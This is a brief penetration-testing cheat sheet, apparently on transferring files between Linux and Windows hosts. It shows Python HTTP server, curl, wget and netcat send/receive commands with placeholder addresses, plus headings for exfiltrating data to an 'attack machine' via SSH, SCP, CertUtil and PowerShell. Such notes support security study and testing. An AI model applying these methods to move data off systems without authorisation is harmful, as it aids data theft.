File Transfers
Linux and Windows file transfers
Python HTTP Server
# Hosting Machine
python -m SimpleHTTPServer
# Connecting Machine:
curl -o output.txt http://IP_Address:portnumber/filename.txt
#or
wget http://IP_Address:portnumber/filename.txtNetcat
# receiving/listening:
nc -l -p 4444 > outfile.txt
# sending/connecting:
nc -w 3 DEST_IP_ADDRESS 4444 < sendfile.txt‌CertUtil
‌Powershell
‌Setting up SMB Server
SSH transfers to Attack Machine (exfiltrate)
Using SCP to copy files over SSH.
Invoke Web Request (HTTP request like curl)
Last updated